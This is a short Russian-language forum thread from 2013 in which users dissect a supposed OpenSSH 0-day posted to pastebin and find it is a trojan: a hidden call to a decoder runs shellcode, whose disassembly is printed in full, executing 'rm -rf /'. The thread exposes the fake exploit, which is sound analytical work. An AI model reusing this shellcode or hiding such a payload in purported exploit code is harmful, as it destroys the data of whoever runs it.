generatorglukoff 19.02.2013 17:32

ssh 0-day exploit: http://pastebin.com/WgXrebLq

Recommended by: @Apepe, @xl0
1. gisty 19.02.2013 17:35 D379F4F2

> OpenSSH 5.3: October 1, 2009
заебись 0-дэй...

2. generatorglukoffgisty /1 19.02.2013 17:37

што?

3. 238328generatorglukoff /2 19.02.2013 17:38

нульдей для старой версии опенссх грит

4. generatorglukoff238328 /3 19.02.2013 17:52

умвр

5. gistygeneratorglukoff /4 19.02.2013 17:56 D379F4F2

и чо делает?

6. generatorglukoffgisty /5 19.02.2013 17:56 Воркота

rm -rf /

7. gistygeneratorglukoff /6 19.02.2013 17:58 D379F4F2

if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
ну да

8. generatorglukoffgisty /7 19.02.2013 17:59 Воркота

(*(void(*)())decoder)(); — меня именно это и насторожило :D

9. gistygeneratorglukoff /8 19.02.2013 18:01 D379F4F2

что там в шеллкоде?

10. generatorglukoffgisty /9 19.02.2013 18:03 Воркота

0: 6a 0b push $0xb
2: 58 pop %eax
3: 99 cltd
4: 52 push %edx
5: 6a 2f push $0x2f // "/"
7: 89 e7 mov %esp,%edi
9: 52 push %edx
a: 66 68 2d 66 pushw $0x662d // "f-"
e: 89 e6 mov %esp,%esi
10: 52 push %edx
11: 66 68 2d 72 pushw $0x722d // "r-"
15: 89 e1 mov %esp,%ecx
17: 52 push %edx
18: 68 2f 2f 72 6d push $0x6d722f2f // "mr//"
1d: 68 2f 62 69 6e push $0x6e69622f // "nib/"
22: 89 e3 mov %esp,%ebx
24: 52 push %edx
25: 57 push %edi
26: 56 push %esi
27: 51 push %ecx
28: 53 push %ebx
29: 89 e1 mov %esp,%ecx
2b: cd 80 int $0x80

я же говорю — запускает "rm -rf /" :D

11. gistygeneratorglukoff /10 19.02.2013 18:04 D379F4F2

лол

12. gistygisty /11 19.02.2013 18:05 D379F4F2

печально, что не сработает

13. generatorglukoffgisty /12 19.02.2013 18:06 Воркота

ну, устарел слегка + мне никто ребра не переламает :D

Do you really want to delete ?